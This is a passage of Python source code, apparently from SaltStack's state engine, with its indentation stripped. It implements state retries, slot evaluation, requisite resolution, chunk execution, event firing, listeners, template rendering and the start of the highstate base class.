"comment": "An exception occurred in this state: {}".format(trb),
}
finally:
if low.get("__prereq__"):
sys.modules[self.states[cdata["full"]].__module__].__opts__[
"test"
] = test
self.state_con.pop("runas", None)
self.state_con.pop("runas_password", None)
if not isinstance(ret, dict):
return ret
# If format_call got any warnings, let's show them to the user
if "warnings" in cdata:
ret.setdefault("warnings", []).extend(cdata["warnings"])
if "provider" in low:
self.load_modules()
if low.get("__prereq__"):
low["__prereq__"] = False
return ret
ret["__sls__"] = low.get("__sls__")
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
utc_finish_time = datetime.datetime.utcnow()
timezone_delta = datetime.datetime.utcnow() - datetime.datetime.now()
local_finish_time = utc_finish_time - timezone_delta
local_start_time = utc_start_time - timezone_delta
ret["start_time"] = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
ret["__id__"] = low["__id__"]
log.info(
"Completed state [%s] at time %s (duration_in_ms=%s)",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_finish_time.time().isoformat(),
duration,
)
if "retry" in low:
low["retry"] = self.verify_retry_data(low["retry"])
if not sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]:
if low["retry"]["until"] != ret["result"]:
if low["retry"]["attempts"] > retries:
interval = low["retry"]["interval"]
if low["retry"]["splay"] != 0:
interval = interval + random.randint(
0, low["retry"]["splay"]
)
log.info(
"State result does not match retry until value, "
"state will be re-run in %s seconds",
interval,
)
self.functions["test.sleep"](interval)
retry_ret = self.call(low, chunks, running, retries=retries + 1)
orig_ret = ret
ret = retry_ret
ret["comment"] = "\n".join(
[
(
'Attempt {}: Returned a result of "{}", '
'with the following comment: "{}"'.format(
retries, orig_ret["result"], orig_ret["comment"]
)
),
"" if not ret["comment"] else ret["comment"],
]
)
ret["duration"] = (
ret["duration"] + orig_ret["duration"] + (interval * 1000)
)
if retries == 1:
ret["start_time"] = orig_ret["start_time"]
else:
ret["comment"] = " ".join(
[
"" if not ret["comment"] else str(ret["comment"]),
(
"The state would be retried every {1} seconds "
"(with a splay of up to {3} seconds) "
"a maximum of {0} times or until a result of {2} "
"is returned"
).format(
low["retry"]["attempts"],
low["retry"]["interval"],
low["retry"]["until"],
low["retry"]["splay"],
),
]
)
return ret
def __eval_slot(self, slot):
log.debug("Evaluating slot: %s", slot)
fmt = slot.split(":", 2)
if len(fmt) != 3:
log.warning("Malformed slot: %s", slot)
return slot
if fmt[1] != "salt":
log.warning("Malformed slot: %s", slot)
log.warning(
"Only execution modules are currently supported in slots. This means slot "
'should start with "__slot__:salt:"'
)
return slot
fun, args, kwargs = salt.utils.args.parse_function(fmt[2])
if not fun or fun not in self.functions:
log.warning("Malformed slot: %s", slot)
log.warning(
"Execution module should be specified in a function call format: "
"test.arg('arg', kw='kwarg')"
)
return slot
log.debug("Calling slot: %s(%s, %s)", fun, args, kwargs)
slot_return = self.functions[fun](*args, **kwargs)
# Given input __slot__:salt:test.arg(somekey="value").not.exist ~ /appended
# slot_text should be __slot...).not.exist
# append_data should be ~ /appended
slot_text = fmt[2].split("~")[0]
append_data = fmt[2].split("~", 1)[1:]
log.debug("slot_text: %s", slot_text)
log.debug("append_data: %s", append_data)
# Support parsing slot dict response
# return_get should result in a kwargs.nested.dict path by getting
# everything after first closing paren: )
return_get = None
try:
return_get = slot_text[slot_text.rindex(")") + 1 :]
except ValueError:
pass
if return_get:
# remove first period
return_get = return_get.split(".", 1)[1].strip()
log.debug("Searching slot result %s for %s", slot_return, return_get)
slot_return = salt.utils.data.traverse_dict_and_list(
slot_return, return_get, default=None, delimiter="."
)
if append_data:
if isinstance(slot_return, str):
# Append text to slot string result
append_data = " ".join(append_data).strip()
log.debug("appending to slot result: %s", append_data)
slot_return += append_data
else:
log.error("Ignoring slot append, slot result is not a string")
return slot_return
def format_slots(self, cdata):
"""
Read in the arguments from the low level slot syntax to make a last
        minute runtime call to gather relevant data for the specific routine.
Will parse strings, first level of dictionary values, and strings and
first level dict values inside of lists
"""
        # __slot__:salt:cmd.run(foo, bar, baz=qux)
SLOT_TEXT = "__slot__:"
ctx = (("args", enumerate(cdata["args"])), ("kwargs", cdata["kwargs"].items()))
for atype, avalues in ctx:
for ind, arg in avalues:
arg = salt.utils.data.decode(arg, keep=True)
if isinstance(arg, dict):
# Search dictionary values for __slot__:
for key, value in arg.items():
try:
if value.startswith(SLOT_TEXT):
log.trace("Slot processsing dict value %s", value)
cdata[atype][ind][key] = self.__eval_slot(value)
except AttributeError:
# Not a string/slot
continue
elif isinstance(arg, list):
for idx, listvalue in enumerate(arg):
log.trace("Slot processing list value: %s", listvalue)
if isinstance(listvalue, dict):
# Search dict values in list for __slot__:
for key, value in listvalue.items():
try:
if value.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested dict value %s",
value,
)
cdata[atype][ind][idx][key] = self.__eval_slot(
value
)
except AttributeError:
# Not a string/slot
continue
if isinstance(listvalue, str):
# Search strings in a list for __slot__:
if listvalue.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested string %s", listvalue
)
cdata[atype][ind][idx] = self.__eval_slot(listvalue)
elif isinstance(arg, str) and arg.startswith(SLOT_TEXT):
# Search strings for __slot__:
log.trace("Slot processsing %s", arg)
cdata[atype][ind] = self.__eval_slot(arg)
else:
# Not a slot, skip it
continue
def verify_retry_data(self, retry_data):
"""
verifies the specified retry data
"""
retry_defaults = {
"until": True,
"attempts": 2,
"splay": 0,
"interval": 30,
}
expected_data = {
"until": bool,
"attempts": int,
"interval": int,
"splay": int,
}
validated_retry_data = {}
if isinstance(retry_data, dict):
for expected_key, value_type in expected_data.items():
if expected_key in retry_data:
if isinstance(retry_data[expected_key], value_type):
validated_retry_data[expected_key] = retry_data[expected_key]
else:
log.warning(
"An invalid value was passed for the retry %s, "
"using default value '%s'",
expected_key,
retry_defaults[expected_key],
)
validated_retry_data[expected_key] = retry_defaults[
expected_key
]
else:
validated_retry_data[expected_key] = retry_defaults[expected_key]
else:
log.warning(
"State is set to retry, but a valid dict for retry "
"configuration was not found. Using retry defaults"
)
validated_retry_data = retry_defaults
return validated_retry_data
def call_chunks(self, chunks):
"""
Iterate over a list of chunks and call them, checking for requires.
"""
# Check for any disabled states
disabled = {}
if "state_runs_disabled" in self.opts["grains"]:
for low in chunks[:]:
state_ = "{}.{}".format(low["state"], low["fun"])
for pat in self.opts["grains"]["state_runs_disabled"]:
if fnmatch.fnmatch(state_, pat):
comment = (
'The state function "{0}" is currently disabled by "{1}", '
"to re-enable, run state.enable {1}."
).format(state_, pat,)
_tag = _gen_tag(low)
disabled[_tag] = {
"changes": {},
"result": False,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
chunks.remove(low)
break
running = {}
for low in chunks:
if "__FAILHARD__" in running:
running.pop("__FAILHARD__")
return running
tag = _gen_tag(low)
if tag not in running:
# Check if this low chunk is paused
action = self.check_pause(low)
if action == "kill":
break
running = self.call_chunk(low, running, chunks)
if self.check_failhard(low, running):
return running
self.active = set()
while True:
if self.reconcile_procs(running):
break
time.sleep(0.01)
ret = dict(list(disabled.items()) + list(running.items()))
return ret
def check_failhard(self, low, running):
"""
Check if the low data chunk should send a failhard signal
"""
tag = _gen_tag(low)
if self.opts.get("test", False):
return False
if low.get("failhard", self.opts["failhard"]) and tag in running:
if running[tag]["result"] is None:
return False
return not running[tag]["result"]
return False
def check_pause(self, low):
"""
Check to see if this low chunk has been paused
"""
if not self.jid:
# Can't pause on salt-ssh since we can't track continuous state
return
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
start = time.time()
if os.path.isfile(pause_path):
try:
                tries = 0
                while True:
with salt.utils.files.fopen(pause_path, "rb") as fp_:
try:
pdat = msgpack_deserialize(fp_.read())
except salt.utils.msgpack.exceptions.UnpackValueError:
# Reading race condition
if tries > 10:
# Break out if there are a ton of read errors
return
tries += 1
time.sleep(1)
continue
id_ = low["__id__"]
key = ""
if id_ in pdat:
key = id_
elif "__all__" in pdat:
key = "__all__"
if key:
if "duration" in pdat[key]:
now = time.time()
if now - start > pdat[key]["duration"]:
return "run"
if "kill" in pdat[key]:
return "kill"
else:
return "run"
time.sleep(1)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Failed to read in pause data for file located at: %s", pause_path
)
return "run"
return "run"
def reconcile_procs(self, running):
"""
Check the running dict for processes and resolve them
"""
retset = set()
for tag in running:
proc = running[tag].get("proc")
if proc:
if not proc.is_alive():
ret_cache = os.path.join(
self.opts["cachedir"],
self.jid,
salt.utils.hashutils.sha1_digest(tag),
)
if not os.path.isfile(ret_cache):
ret = {
"result": False,
"comment": "Parallel process failed to return",
"name": running[tag]["name"],
"changes": {},
}
try:
with salt.utils.files.fopen(ret_cache, "rb") as fp_:
ret = msgpack_deserialize(fp_.read())
except OSError:
ret = {
"result": False,
"comment": "Parallel cache failure",
"name": running[tag]["name"],
"changes": {},
}
running[tag].update(ret)
running[tag].pop("proc")
else:
retset.add(False)
return False not in retset
def check_requisite(self, low, running, chunks, pre=False):
"""
Look into the running data to check the status of all requisite
states
"""
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
present = False
# If mod_watch is not available make it a require
if "watch" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require" in low:
low["require"].extend(low.pop("watch"))
else:
low["require"] = low.pop("watch")
else:
present = True
if "watch_any" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require_any" in low:
low["require_any"].extend(low.pop("watch_any"))
else:
low["require_any"] = low.pop("watch_any")
else:
present = True
if "require" in low:
present = True
if "require_any" in low:
present = True
if "prerequired" in low:
present = True
if "prereq" in low:
present = True
if "onfail" in low:
present = True
if "onfail_any" in low:
present = True
if "onfail_all" in low:
present = True
if "onchanges" in low:
present = True
if "onchanges_any" in low:
present = True
if not present:
return "met", ()
self.reconcile_procs(running)
reqs = {
"require": [],
"require_any": [],
"watch": [],
"watch_any": [],
"prereq": [],
"onfail": [],
"onfail_any": [],
"onfail_all": [],
"onchanges": [],
"onchanges_any": [],
}
if pre:
reqs["prerequired"] = []
for r_state in reqs:
if r_state in low and low[r_state] is not None:
if r_state in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", r_state
)
continue
for req in low[r_state]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
found = True
reqs[r_state].append(chunk)
continue
try:
if isinstance(req_val, str):
if fnmatch.fnmatch(
chunk["name"], req_val
) or fnmatch.fnmatch(chunk["__id__"], req_val):
if req_key == "id" or chunk["state"] == req_key:
found = True
reqs[r_state].append(chunk)
else:
raise KeyError
except KeyError as exc:
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
except TypeError:
# On Python 2, the above req_val, being an OrderedDict, will raise a KeyError,
# however on Python 3 it will raise a TypeError
# This was found when running tests.unit.test_state.StateCompilerTestCase.test_render_error_on_invalid_requisite
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
if not found:
return "unmet", ()
fun_stats = set()
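        # For every requisite type, collect a per-type status set (req_stats)
        # from the results of the referenced chunks, then fold all of them into
        # fun_stats and reduce that to a single overall status below.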
for r_state, chunks in reqs.items():
req_stats = set()
if r_state.startswith("prereq") and not r_state.startswith("prerequired"):
run_dict = self.pre
else:
run_dict = running
while True:
if self.reconcile_procs(run_dict):
break
time.sleep(0.01)
for chunk in chunks:
tag = _gen_tag(chunk)
if tag not in run_dict:
req_stats.add("unmet")
continue
if r_state.startswith("onfail"):
if run_dict[tag]["result"] is True:
req_stats.add("onfail") # At least one state is OK
continue
else:
if run_dict[tag]["result"] is False:
req_stats.add("fail")
continue
if r_state.startswith("onchanges"):
if not run_dict[tag]["changes"]:
req_stats.add("onchanges")
else:
req_stats.add("onchangesmet")
continue
if r_state.startswith("watch") and run_dict[tag]["changes"]:
req_stats.add("change")
continue
if r_state.startswith("prereq") and run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("premet")
if r_state.startswith("prereq") and not run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("pre")
else:
if run_dict[tag].get("__state_ran__", True):
req_stats.add("met")
if r_state.endswith("_any") or r_state == "onfail":
if "met" in req_stats or "change" in req_stats:
if "fail" in req_stats:
req_stats.remove("fail")
if "onchangesmet" in req_stats:
if "onchanges" in req_stats:
req_stats.remove("onchanges")
if "fail" in req_stats:
req_stats.remove("fail")
if "onfail" in req_stats:
# a met requisite in this case implies a success
if "met" in req_stats:
req_stats.remove("onfail")
if r_state.endswith("_all"):
if "onfail" in req_stats:
# a met requisite in this case implies a failure
if "met" in req_stats:
req_stats.remove("met")
fun_stats.update(req_stats)
if "unmet" in fun_stats:
status = "unmet"
elif "fail" in fun_stats:
status = "fail"
elif "pre" in fun_stats:
if "premet" in fun_stats:
status = "met"
else:
status = "pre"
elif "onfail" in fun_stats and "onchangesmet" not in fun_stats:
status = "onfail"
elif "onchanges" in fun_stats and "onchangesmet" not in fun_stats:
status = "onchanges"
elif "change" in fun_stats:
status = "change"
else:
status = "met"
return status, reqs
def event(self, chunk_ret, length, fire_event=False):
"""
Fire an event on the master bus
If `fire_event` is set to True an event will be sent with the
chunk name in the tag and the chunk result in the event data.
If `fire_event` is set to a string such as `mystate/is/finished`,
an event will be sent with the string added to the tag and the chunk
result in the event data.
        If `state_events` is set to True in the config, then after the
        chunk is evaluated an event will be sent to the master with the
        results.
"""
if not self.opts.get("local") and (
self.opts.get("state_events", True) or fire_event
):
if not self.opts.get("master_uri"):
ev_func = lambda ret, tag, preload=None: salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
).fire_event(
ret, tag
)
else:
ev_func = self.functions["event.fire_master"]
ret = {"ret": chunk_ret}
if fire_event is True:
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(chunk_ret["name"])], "state_result",
)
elif isinstance(fire_event, str):
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(fire_event)], "state_result",
)
else:
tag = salt.utils.event.tagify(
[self.jid, "prog", self.opts["id"], str(chunk_ret["__run_num__"])],
"job",
)
ret["len"] = length
preload = {"jid": self.jid}
ev_func(ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
"""
Check if a chunk has any requires, execute the requires and then
the chunk
"""
low = self._mod_aggregate(low, running, chunks)
self._mod_init(low)
tag = _gen_tag(low)
if not low.get("prerequired"):
self.active.add(tag)
requisites = [
"require",
"require_any",
"watch",
"watch_any",
"prereq",
"onfail",
"onfail_any",
"onchanges",
"onchanges_any",
]
if not low.get("__prereq__"):
requisites.append("prerequired")
status, reqs = self.check_requisite(low, running, chunks, pre=True)
else:
status, reqs = self.check_requisite(low, running, chunks)
if status == "unmet":
lost = {}
reqs = []
for requisite in requisites:
lost[requisite] = []
if requisite not in low:
continue
for req in low[requisite]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
req_key = next(iter(req))
req_val = req[req_key]
for chunk in chunks:
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
if requisite == "prereq":
chunk["__prereq__"] = True
reqs.append(chunk)
found = True
continue
if fnmatch.fnmatch(chunk["name"], req_val) or fnmatch.fnmatch(
chunk["__id__"], req_val
):
if req_key == "id" or chunk["state"] == req_key:
if requisite == "prereq":
chunk["__prereq__"] = True
elif requisite == "prerequired":
chunk["__prerequired__"] = True
reqs.append(chunk)
found = True
if not found:
lost[requisite].append(req)
if (
lost["require"]
or lost["watch"]
or lost["prereq"]
or lost["onfail"]
or lost["onchanges"]
or lost["require_any"]
or lost["watch_any"]
or lost["onfail_any"]
or lost["onchanges_any"]
or lost.get("prerequired")
):
comment = "The following requisites were not found:\n"
for requisite, lreqs in lost.items():
if not lreqs:
continue
comment += "{}{}:\n".format(" " * 19, requisite)
for lreq in lreqs:
req_key = next(iter(lreq))
req_val = lreq[req_key]
comment += "{}{}: {}\n".format(" " * 23, req_key, req_val)
if low.get("__prereq__"):
run_dict = self.pre
else:
run_dict = running
start_time, duration = _calculate_fake_duration()
run_dict[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(run_dict[tag], len(chunks), fire_event=low.get("fire_event"))
return running
for chunk in reqs:
# Check to see if the chunk has been run, only run it if
# it has not been run already
ctag = _gen_tag(chunk)
if ctag not in running:
if ctag in self.active:
if chunk.get("__prerequired__"):
                            # Prereq recursive, run this chunk with prereq on
if tag not in self.pre:
low["__prereq__"] = True
self.pre[ctag] = self.call(low, chunks, running)
return running
else:
return running
elif ctag not in running:
log.error("Recursive requisite found")
running[tag] = {
"changes": {},
"result": False,
"comment": "Recursive requisite found",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(
running[tag], len(chunks), fire_event=low.get("fire_event")
)
return running
running = self.call_chunk(chunk, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
if low.get("__prereq__"):
status, reqs = self.check_requisite(low, running, chunks)
self.pre[tag] = self.call(low, chunks, running)
if not self.pre[tag]["changes"] and status == "change":
self.pre[tag]["changes"] = {"watch": "watch"}
self.pre[tag]["result"] = None
else:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
elif status == "met":
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
elif status == "fail":
# if the requisite that failed was due to a prereq on this low state
# show the normal error
if tag in self.pre:
running[tag] = self.pre[tag]
running[tag]["__run_num__"] = self.__run_num
running[tag]["__sls__"] = low["__sls__"]
# otherwise the failure was due to a requisite down the chain
else:
                # determine what the requisite failures were, and return
# a nice error message
failed_requisites = set()
# look at all requisite types for a failure
for req_lows in reqs.values():
for req_low in req_lows:
req_tag = _gen_tag(req_low)
req_ret = self.pre.get(req_tag, running.get(req_tag))
# if there is no run output for the requisite it
# can't be the failure
if req_ret is None:
continue
# If the result was False (not None) it was a failure
if req_ret["result"] is False:
                            # use SLS.ID for the key -- so it's easier to find
key = "{sls}.{_id}".format(
sls=req_low["__sls__"], _id=req_low["__id__"]
)
failed_requisites.add(key)
_cmt = "One or more requisite failed: {}".format(
", ".join(str(i) for i in failed_requisites)
)
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": _cmt,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.pre[tag] = running[tag]
self.__run_num += 1
elif status == "change" and not low.get("__prereq__"):
ret = self.call(low, chunks, running)
if not ret["changes"] and not ret.get("skip_watch", False):
low = low.copy()
low["sfun"] = low["fun"]
low["fun"] = "mod_watch"
low["__reqs__"] = reqs
ret = self.call(low, chunks, running)
running[tag] = ret
elif status == "pre":
start_time, duration = _calculate_fake_duration()
pre_ret = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "No changes detected",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
running[tag] = pre_ret
self.pre[tag] = pre_ret
self.__run_num += 1
elif status == "onfail":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because onfail req did not change",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
elif status == "onchanges":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because none of the onchanges reqs changed",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
else:
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
if tag in running:
self.event(running[tag], len(chunks), fire_event=low.get("fire_event"))
for sub_state_data in running[tag].pop("sub_state_run", ()):
start_time, duration = _calculate_fake_duration()
self.__run_num += 1
sub_tag = _gen_tag(sub_state_data["low"])
running[sub_tag] = {
"name": sub_state_data["low"]["name"],
"changes": sub_state_data["changes"],
"result": sub_state_data["result"],
"duration": sub_state_data.get("duration", duration),
"start_time": sub_state_data.get("start_time", start_time),
"comment": sub_state_data.get("comment", ""),
"__state_ran__": True,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
return running
def call_listen(self, chunks, running):
"""
Find all of the listen routines and call the associated mod_watch runs
"""
listeners = []
crefs = {}
for chunk in chunks:
crefs[(chunk["state"], chunk["__id__"], chunk["name"])] = chunk
if "listen" in chunk:
listeners.append(
{(chunk["state"], chunk["__id__"], chunk["name"]): chunk["listen"]}
)
if "listen_in" in chunk:
for l_in in chunk["listen_in"]:
for key, val in l_in.items():
listeners.append(
{(key, val, "lookup"): [{chunk["state"]: chunk["__id__"]}]}
)
mod_watchers = []
errors = {}
for l_dict in listeners:
for key, val in l_dict.items():
for listen_to in val:
if not isinstance(listen_to, dict):
found = False
for chunk in chunks:
if (
chunk["__id__"] == listen_to
or chunk["name"] == listen_to
):
listen_to = {chunk["state"]: chunk["__id__"]}
found = True
if not found:
continue
for lkey, lval in listen_to.items():
if not any(lkey == cref[0] and lval in cref for cref in crefs):
rerror = {
_l_tag(lkey, lval): {
"comment": "Referenced state {}: {} does not exist".format(
lkey, lval
),
"name": "listen_{}:{}".format(lkey, lval),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
to_tags = [
_gen_tag(data)
for cref, data in crefs.items()
if lkey == cref[0] and lval in cref
]
for to_tag in to_tags:
if to_tag not in running:
continue
if running[to_tag]["changes"]:
if not any(
key[0] == cref[0] and key[1] in cref
for cref in crefs
):
rerror = {
_l_tag(key[0], key[1]): {
"comment": "Referenced state {}: {} does not exist".format(
key[0], key[1]
),
"name": "listen_{}:{}".format(
key[0], key[1]
),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
new_chunks = [
data
for cref, data in crefs.items()
if key[0] == cref[0] and key[1] in cref
]
for chunk in new_chunks:
low = chunk.copy()
low["sfun"] = chunk["fun"]
low["fun"] = "mod_watch"
low["__id__"] = "listener_{}".format(low["__id__"])
for req in STATE_REQUISITE_KEYWORDS:
if req in low:
low.pop(req)
mod_watchers.append(low)
ret = self.call_chunks(mod_watchers)
running.update(ret)
for err in errors:
errors[err]["__run_num__"] = self.__run_num
self.__run_num += 1
running.update(errors)
return running
def call_high(self, high, orchestration_jid=None):
"""
Process a high data call and ensure the defined states.
"""
errors = []
# If there is extension data reconcile it
high, ext_errors = self.reconcile_extend(high)
errors.extend(ext_errors)
errors.extend(self.verify_high(high))
if errors:
return errors
high, req_in_errors = self.requisite_in(high)
errors.extend(req_in_errors)
high = self.apply_exclude(high)
# Verify that the high data is structurally sound
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.compile_high_data(high, orchestration_jid)
# If there are extensions in the highstate, process them and update
# the low data chunks
if errors:
return errors
ret = self.call_chunks(chunks)
ret = self.call_listen(chunks, ret)
def _cleanup_accumulator_data():
accum_data_path = os.path.join(
get_accumulator_dir(self.opts["cachedir"]), self.instance_id
)
try:
os.remove(accum_data_path)
log.debug("Deleted accumulator data file %s", accum_data_path)
except OSError:
log.debug("File %s does not exist, no need to cleanup", accum_data_path)
_cleanup_accumulator_data()
if self.jid is not None:
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
if os.path.isfile(pause_path):
try:
os.remove(pause_path)
except OSError:
# File is not present, all is well
pass
return ret
def render_template(self, high, template):
errors = []
if not high:
return high, errors
if not isinstance(high, dict):
errors.append(
"Template {} does not render to a dictionary".format(template)
)
return high, errors
invalid_items = ("include", "exclude", "extends")
for item in invalid_items:
if item in high:
errors.append(
"The '{}' declaration found on '{}' is invalid when "
"rendering single templates".format(item, template)
)
return high, errors
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
                    # If this is a short state, it needs to be padded
if "." in high[name]:
comps = high[name].split(".")
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
errors.append(
"ID {} in template {} is not a dictionary".format(
name, template
)
)
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if high[name][key] is None:
errors.append(
"ID '{}' in template {} contains a short "
"declaration ({}) with a trailing colon. When not "
"passing any arguments to a state, the colon must be "
"omitted.".format(name, template, key)
)
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in template '{}' contains multiple "
"state declarations of the same type".format(name, template)
)
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high, errors
def call_template(self, template):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, template)
if errors:
return errors
return self.call_high(high)
def call_template_str(self, template):
"""
Enforce the states in a template, pass the template as a string
"""
high = compile_template_str(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, "<template-str>")
if errors:
return errors
return self.call_high(high)
class LazyAvailStates:
"""
The LazyAvailStates lazily loads the list of states of available
environments.
    This is particularly useful when top_file_merging_strategy=same and there
are many environments.
"""
def __init__(self, hs):
self._hs = hs
self._avail = {"base": None}
self._filled = False
def _fill(self):
if self._filled:
return
for saltenv in self._hs._get_envs():
if saltenv not in self._avail:
self._avail[saltenv] = None
self._filled = True
def __contains__(self, saltenv):
if saltenv == "base":
return True
self._fill()
return saltenv in self._avail
def __getitem__(self, saltenv):
if saltenv != "base":
self._fill()
if self._avail[saltenv] is None:
self._avail[saltenv] = self._hs.client.list_states(saltenv)
return self._avail[saltenv]
def items(self):
self._fill()
ret = []
        for saltenv in self._avail:
            ret.append((saltenv, self.__getitem__(saltenv)))
return ret
class BaseHighState:
"""
The BaseHighState is an abstract base class that is the foundation of
running a highstate, extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
"""
def __init__(self, opts):
self.opts = self.__gen_opts(opts)
self.iorder = 10000
self.avail = self.__gather_avail()
self.serial = salt.payload.Serial(self.opts)
self.building_highstate = OrderedDict()
def __gather_avail(self):
"""
Lazily gather the lists of available sls data from the master
"""
return LazyAvailStates(self)
def __gen_opts(self, opts):
"""
The options used by the High State object are derived from options
on the minion and the master, or just the minion if the high state
call is entirely local.
"""
# If the state is intended to be applied locally, then the local opts
# should have all of the needed data, otherwise overwrite the local
# data items with data from the master
if "local_state" in opts:
if opts["local_state"]:
return opts
mopts = self.client.master_opts()
if not isinstance(mopts, dict):
# An error happened on the master
opts["renderer"] = "jinja|yaml"
opts["failhard"] = False
opts["state_top"] = salt.utils.url.create("top.sls")
opts["nodegroups"] = {}
opts["file_roots"] = {"base": [syspaths.BASE_FILE_ROOTS_DIR]}
else:
opts["renderer"] = mopts["renderer"]
opts["failhard"] = mopts.get("failhard", False)
if mopts["state_top"].startswith("salt://"):
opts["state_top"] = mopts["state_top"]
elif mopts["state_top"].startswith("/"):
opts["state_top"] = salt.utils.url.create(mopts["state_top"][1:])
else:
opts["state_top"] = salt.utils.url.create(mopts["state_top"])
opts["state_top_saltenv"] = mopts.get("state_top_saltenv", None)
opts["nodegroups"] = mopts.get("nodegroups", {})
opts["state_auto_order"] = mopts.get(
"state_auto_order", opts["state_auto_order"]
)
opts["file_roots"] = mopts["file_roots"]
opts["top_file_merging_strategy"] = mopts.get(
"top_file_merging_strategy", opts.get("top_file_merging_strategy")
)
opts["env_order"] = mopts.get("env_order", opts.get("env_order", []))
opts["default_top"] = mopts.get("default_top", opts.get("default_top"))
opts["state_events"] = mopts.get("state_events")
opts["state_aggregate"] = mopts.get(
"state_aggregate", opts.get("state_aggregate", False)
)
opts["jinja_env"] = mopts.get("jinja_env", {})
opts["jinja_sls_env"] = mopts.get("jinja_sls_env", {})
opts["jinja_lstrip_blocks"] = mopts.get("jinja_lstrip_blocks", False)
opts["jinja_trim_blocks"] = mopts.get("jinja_trim_blocks", False)
return opts
def _get_envs(self):
"""
Pull the file server environments out of the master options
"""
envs = ["base"]
if "file_roots" in self.opts:
envs.extend([x for x in list(self.opts["file_roots"]) if x not in envs])
env_order = self.opts.get("env_order", [])
# Remove duplicates while preserving the order
members = set()
env_order = [
env for env in env_order if not (env in members or members.add(env))
]
client_envs = self.client.envs()
if env_order and client_envs:
return [env for env in env_order if env in client_envs]
elif env_order:
return env_order
else:
envs.extend([env for env in client_envs if env not in envs])
return envs
def get_tops(self):
"""
Gather the top files
"""
tops = DefaultOrderedDict(list)
include = DefaultOrderedDict(list)
done = DefaultOrderedDict(list)
found = 0 # did we find any contents in the top files?
# Gather initial top files
merging_strategy = self.opts["top_file_merging_strategy"]
if merging_strategy == "same" and not self.opts["saltenv"]:
if not self.opts["default_top"]:
raise SaltRenderError(
